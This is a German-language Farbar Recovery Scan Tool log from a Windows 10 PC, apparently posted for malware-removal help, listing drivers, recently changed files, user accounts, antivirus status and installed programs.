S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2021-01-04] (SurfRight B.V. -> )
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [46688 2019-12-07] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [350136 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [54200 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-13 20:43 - 2021-01-13 20:44 - 000051869 ____C C:\Users\Peter\Desktop\Addition.txt
2021-01-13 20:42 - 2021-01-13 22:45 - 000015799 ____C C:\Users\Peter\Desktop\FRST.txt
2021-01-13 20:41 - 2021-01-13 22:45 - 000000000 ___DC C:\FRST
2021-01-13 20:33 - 2021-01-13 21:59 - 002281472 ____C (Farbar) C:\Users\Peter\Desktop\FRST64.exe
2021-01-07 11:18 - 2021-01-07 11:19 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000455408 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000351128 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001507224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001161112 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000816368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000673520 _____ C:\WINDOWS\system32\nvofapi64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000670616 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000555248 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000543128 _____ C:\WINDOWS\SysWOW64\nvofapi.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000047424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 007707544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 006860184 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 004174064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002508528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002098072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001731824 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001585560 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001482992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:00 - 005972824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2021-01-06 17:39 - 2021-01-06 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-06 16:48 - 2021-01-08 08:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-04 15:59 - 2021-01-04 15:59 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2021-01-04 15:57 - 2021-01-04 15:57 - 000016810 _____ C:\WINDOWS\system32\.crusader
2021-01-04 15:44 - 2021-01-12 15:22 - 000000000 ____D C:\WINDOWS\CryptoGuard
2021-01-04 15:44 - 2021-01-12 15:20 - 000000000 ____D C:\ProgramData\HitmanPro.Alert
2021-01-04 15:41 - 2021-01-12 15:23 - 000000000 ____D C:\ProgramData\Sophos
2021-01-04 15:40 - 2021-01-04 15:40 - 307274360 _____ (Sophos Limited) C:\Users\Peter\Downloads\SophosInstall.exe
2020-12-17 10:06 - 2020-12-17 10:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-13 22:43 - 2020-08-02 10:34 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-13 22:43 - 2020-08-02 10:26 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-13 22:43 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-13 22:43 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-13 22:43 - 2018-11-24 12:22 - 000000000 ____D C:\ProgramData\NVIDIA
2021-01-13 22:25 - 2020-08-02 10:34 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-13 22:25 - 2019-12-07 15:51 - 000743650 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-13 22:25 - 2019-12-07 15:51 - 000150072 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-13 22:25 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-13 22:18 - 2020-08-02 10:28 - 000888896 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-13 22:18 - 2017-04-02 14:16 - 000000000 ____D C:\ProgramData\McAfee
2021-01-13 22:11 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-13 22:11 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-13 22:05 - 2018-03-19 14:48 - 000000000 ___DC C:\Users\Peter\AppData\Local\Packages
2021-01-13 22:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2021-01-13 22:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2021-01-13 22:04 - 2017-04-02 11:56 - 000000000 ___DC C:\Users\Peter\AppData\LocalLow\Mozilla
2021-01-13 22:03 - 2017-12-01 10:41 - 000000000 ___DC C:\Users\Peter\AppData\Local\QMxNetworkSync
2021-01-12 14:54 - 2020-08-02 10:28 - 000000000 ____D C:\Users\Peter
2021-01-09 16:49 - 2020-08-02 10:28 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-09 09:16 - 2020-08-04 15:39 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2021-01-08 08:56 - 2020-12-11 10:37 - 000094208 _____ C:\Users\Peter\AppData\Roaming\cookies.sqlite
2021-01-08 08:54 - 2017-03-31 21:22 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-07 11:20 - 2018-11-24 12:21 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2021-01-07 11:19 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Help
2021-01-07 11:19 - 2018-11-24 12:21 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2021-01-06 17:39 - 2017-04-02 11:42 - 000001012 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-04 10:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-04 10:41 - 2017-12-01 10:37 - 000000000 ____D C:\ProgramData\tmp
2020-12-31 16:20 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-12-30 10:35 - 2018-05-17 11:33 - 000000000 ___DC C:\Users\Peter\AppData\Local\PlaceholderTileLogoFolder
2020-12-26 15:54 - 2017-09-03 11:42 - 000011483 ____C C:\Users\Peter\Documents\Etiketten 2.odt
2020-12-22 10:53 - 2020-03-04 19:02 - 000000650 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-22 10:53 - 2020-03-04 19:02 - 000000554 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-20 17:40 - 2020-08-02 10:34 - 000003802 _____ C:\WINDOWS\system32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-08-02 10:34 - 000003706 _____ C:\WINDOWS\system32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-03-04 19:02 - 000000000 ____D C:\Users\Peter\AppData\Local\GoToMeeting
2020-12-17 10:43 - 2017-03-31 21:22 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-12-14 14:34 - 2020-11-03 10:52 - 000000000 ____D C:\Users\Peter\AppData\Local\cache
2020-12-14 14:33 - 2020-11-03 10:52 - 000000000 ____D C:\Users\Peter\AppData\Local\Travel Maps

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-12-11 10:37 - 2021-01-08 08:56 - 000094208 _____ () C:\Users\Peter\AppData\Roaming\cookies.sqlite
2018-07-18 11:17 - 2018-07-18 11:17 - 000006144 ____C () C:\Users\Peter\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-05-15 18:39 - 2017-05-15 18:39 - 000007619 ____C () C:\Users\Peter\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         
Addition.txt
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von Peter (13-01-2021 22:46:31)
Gestartet von C:\Users\Peter\Desktop
Windows 10 Pro Version 2004 19041.685 (X64) (2020-08-02 09:35:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-716491260-3257532223-3478221735-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-716491260-3257532223-3478221735-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-716491260-3257532223-3478221735-1000 - Limited - Disabled) => C:\Users\defaultuser0
Gast (S-1-5-21-716491260-3257532223-3478221735-501 - Limited - Disabled)
Peter (S-1-5-21-716491260-3257532223-3478221735-1001 - Administrator - Enabled) => C:\Users\Peter
WDAGUtilityAccount (S-1-5-21-716491260-3257532223-3478221735-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee VirusScan (Enabled - Up to date) {4DE344F8-6897-65B4-CED0-82B3AF2591B4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AeroFly Professional Deluxe (inkl. Add-On 1) (HKLM-x32\...\{8B3E5A90-1F6E-4FAF-B84F-C306C8A80809}) (Version: 1.9.0103 - IPACS)
AeroFly Professional Deluxe AddOn 3 (True Scale AddOn) (HKLM-x32\...\{4F5EBA69-57B4-484D-B60D-DD95981031A0}) (Version: 1.11.0705 - IPACS)
AeroFly Professional Deluxe AddOn 4 (Team Edition 1) (HKLM-x32\...\{780FAA54-2FA0-4CF4-A9C8-AE50C8B469C9}) (Version: 1.11.0707 - IPACS)
Apple Application Support (32-Bit) (HKLM-x32\...\{5C028510-A6A1-409A-A2BF-4DCB43B21EF9}) (Version: 7.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{5C7D4FCF-80C5-4520-9934-D50532AAC59C}) (Version: 7.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B5A46811-3612-4DA5-8A5A-E6DED5D7C523}) (Version: 12.2.1.12 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{3E245378-BF77-6946-C6F6-096DBE5EAB82}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{45907537-804A-514F-5280-5F4F12A6DCBC}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{962364E4-08BB-347D-32E7-2B789F37BF8A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{A0407E39-2AA4-60B3-885F-3C5347B6909E}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0989D0EA-AFF3-5F9A-3D25-20EE133E409B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{A8689A0F-5928-7300-B82B-C5E85131B7BA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{76AAF56B-93D8-161D-809A-EC05F3B913DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{063CED74-F5F0-870E-DC9C-2D78FDEDA3EE}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{13BB60AA-88F7-4B1F-2DEC-D81EEDE8B3AA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{37AA6227-FF2C-95AC-87C0-45DCC0BB87DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{EB328356-1DF0-1CCE-3607-6361DD329219}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{87E6EC29-AEC5-28CB-F773-93EB6C1B8A2B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{CA55697D-BD74-3ED8-6B21-D7EDAD3B7D02}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{CFC860C8-4F51-E08C-A74C-2E444ED06160}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{9338D693-38B7-1ED4-9B42-BFA1D5600CCB}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{C971C145-258D-6650-7088-13DDB161327A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{EBA09DAF-14B4-7BE7-676E-6E2FB21EDBDD}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{9AA4DD93-94BF-22EA-C9D2-7084F304A31B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{379D900B-A785-6DB0-012E-434356A365B3}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{366C4FB5-CF6E-258B-418D-E6D29549A278}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B10089DE-934F-6E0F-683A-B788F89348DF}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
CD-LabelPrint (HKLM-x32\...\MediaNavigation.CDLabelPrint) (Version:  - )
CEWE Fotowelt (HKLM-x32\...\CEWE Fotowelt) (Version: 7.1.2 - CEWE Stiftung u Co. KGaA)
cewe-fotoservice.de (HKLM-x32\...\cewe-fotoservice.de) (Version: 7.0.3 - CEWE Stiftung u Co. KGaA)
Content Manager (HKLM-x32\...\Content Manager) (Version: 3.18.5.761538 - NNG Llc.)
Disketch Disc-Beschriftungssoftware (HKLM-x32\...\Disketch) (Version: 3.34 - NCH Software)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.94 - NVIDIA Corporation) Hidden
Druckerdeinstallation für EPSON XP-900 Series (HKLM\...\EPSON XP-900 Series) (Version:  - Seiko Epson Corporation)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 19.2 - Thüringer Landesfinanzdirektion)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson Printer Connection Checker (HKLM-x32\...\{189DE071-E0BC-4BA5-8E34-83D5ED12600B}) (Version: 3.2.0.0 - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{28C66F35-69BF-4376-BC80-4D5F4808FF3C}) (Version: 4.6.1 - Seiko Epson Corporation)
EPSON-Handbücher (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.57.0.0 - Seiko Epson Corporation)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{39AB2E37-1A55-4292-A5D3-971E9F70D0F8}) (Version: 2.1.32.0 - MAGIX AG)
GoTo Opener (HKLM-x32\...\{C0F33C38-345C-4C02-B161-11389350C2A5}) (Version: 1.0.533 - LogMeIn, Inc.)
GoToMeeting 10.15.0.19228 (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\GoToMeeting) (Version: 10.15.0.19228 - LogMeIn, Inc.)
iTunes (HKLM\...\{053441A1-A8BD-486F-B06D-F2B478D5925E}) (Version: 12.9.6.3 - Apple Inc.)
MAGIX Cloud Import (HKLM\...\{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH) Hidden
MAGIX Cloud Import (HKLM\...\MX.{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH)
MAGIX Connect (HKLM\...\{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH) Hidden
MAGIX Connect (HKLM\...\MX.{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH)
MAGIX Foto & Grafik Designer (HKLM\...\{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH) Hidden
MAGIX Foto & Grafik Designer (HKLM-x32\...\MX.{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH)
MAGIX Foto Manager 16 Deluxe (HKLM\...\{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH) Hidden
MAGIX Foto Manager 16 Deluxe (HKLM-x32\...\MX.{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH)
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG) Hidden
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\MAGIX_{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG)
MAGIX PC Check & Tuning 2019 (HKLM-x32\...\PC Check Tuning 2019_is1) (Version: 2.7.0.56 - MAGIX Software GmbH)
MAGIX Screenshare (HKLM-x32\...\{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG) Hidden
MAGIX Screenshare (HKLM-x32\...\MAGIX_{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM\...\{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH) Hidden
MAGIX Speed burnR (HKLM-x32\...\MX.{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH)
MAGIX Travel Maps (HKLM\...\{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH) Hidden
MAGIX Travel Maps (HKLM\...\MX.{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH)
MAGIX Travel Maps Update (HKLM\...\{47A2B863-62A1-4A7D-8AC1-A293C8994747}) (Version: 1.0.1.385 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\{02C2B318-E2DF-4EC4-AD1B-9FF3DD774A04}) (Version: 11.0.0.42 - MAGIX AG) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\MAGIX_MSI_Videodeluxe18_plus) (Version: 11.0.0.42 - MAGIX AG)
MAGIX Video deluxe Plus (Demo) (HKLM\...\{57B24FA4-9B76-490A-8B80-B27F118E751A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 1) (HKLM\...\{4481CFAA-0E76-4076-9FB2-CECEF3D22FE3}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 2) (HKLM\...\{27DFC18E-C49E-4F51-93DD-5E75CE301B9A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 1) (HKLM\...\{395FA56C-DF0F-4836-A3BB-D705B38ABCA1}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 2) (HKLM\...\{B7E1A490-6793-4B18-A803-19AA04197762}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Fotoshow Maker-Stile) (HKLM\...\{388F55AA-7054-43FC-845C-E0A8F549B9AE}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\MX.{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH)
MAGIX Video deluxe Plus (Menüvorlagen) (HKLM\...\{9EAAA0FF-A318-4593-9616-D977655A8B68}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Migrate Content) (HKLM\...\{A0D08159-E17E-4002-8A91-4B29F0145CB8}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Soundtrack Maker-Stile) (HKLM\...\{D5FF70FA-55AD-4B31-87B7-3BB8CB7EED04}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Titeleffekte) (HKLM\...\{81AD8375-39AB-4EEB-9B08-2A9D50F64F91}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Überblendeffekte) (HKLM\...\{39FC2C3B-14F9-48EE-94CC-615459E1C171}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Update Service 5.7.33.77) (HKLM\...\{89C598BE-D4ED-3125-A8AF-406533E46B19}) (Version: 5.7.33.77 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Vorlagen und Effekte) (HKLM-x32\...\MAGIX_GlobalContent.Video_deluxe_Plus) (Version: 1.0.0.0 - MAGIX Software GmbH)
MAGIX Video deluxe Plus Update (HKLM\...\{D5BDA5D0-2661-430E-94A3-8472BF892554}) (Version: 16.0.4.102 - MAGIX Software GmbH) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
